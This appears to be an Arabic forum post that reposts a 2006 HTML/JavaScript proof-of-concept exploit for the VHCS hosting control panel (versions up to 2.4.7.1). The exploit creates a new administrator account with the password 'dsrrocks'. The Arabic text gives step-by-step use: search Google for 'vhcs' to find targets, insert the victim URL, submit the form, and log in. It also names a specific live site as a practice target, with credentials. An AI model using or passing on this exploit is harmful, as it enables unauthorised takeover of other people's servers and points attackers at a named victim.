بسم الله الرحمن الرحيم
اسم الثغره : تغرة Vhcs
ابحث في اى محرك بحث
www.google.comعن كلمه
vhcs
<html>
<head>
<title>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt</title>
<script>
function submitform()
{
if (document.admin_add_user.username.value==\'admin\')
{
alert(\'Learn to read before launching an exploit, script-kiddie!\');
exit();
}
document.admin_add_user.action=document.admin_add_user.target.value;
document.admin_add_user.submit();
}
</script>
</head>
<body>
VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt <roman@rs-labs.com> [08.Feb.2006]
<form>
|
|
| Target URL |
<input>
|
| Username |
<input> (should NOT exist)
|
|
Exploit it! |
|
<input>
<input>
<input>
<input>
</form>
Quick instructions.-
1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace <target> string) and username.
2.- Remember not to use a probably existing username (such as \"admin\").
3.- Launch the exploit. If target system is vulnerable, a new VHCS admin user will be created ;-)
4.- You will be redirected to VHCS login page. Try to login with your brand new username.
5.- Ummm, I forgot it... The password is: dsrrocks.
More info (analysis, fix, etc).-
See RS-2006-1.
</body>
</html>
طبعا نلاحظ الكود بلغه html
اوك نناخد الكود وننسخه واحفظه بامتداد html
وغير كلمه <target>/ لاسم الموقع الى المصاب
وفى خانه Username خير باى اسم تبيه مثلا alsakr
بعد ذالك اضغط على كلمه Exploit it!
تلاحظ انك فى لوحه التحكم ويطلب منك اليوزر والباص
طبعا اليوز الى اعطينا اياه مثلا spectrum
والباص طبعا هوه dsrrocks
تلاحظه مكتوب بلثغره والف مبروك اصبحت فى لوحه التحكم
تقدروا تتطبقوا على فار التجارب
http://www.azirix.org/vhcs2/admin/index.phpadmin: aboly
pasowed : dsrrocks
اعتقد ان ما فى اسهل من كده
واى استفسار
avec le prince de la nuit c'est le p0p
Sujet: trou : vhcs 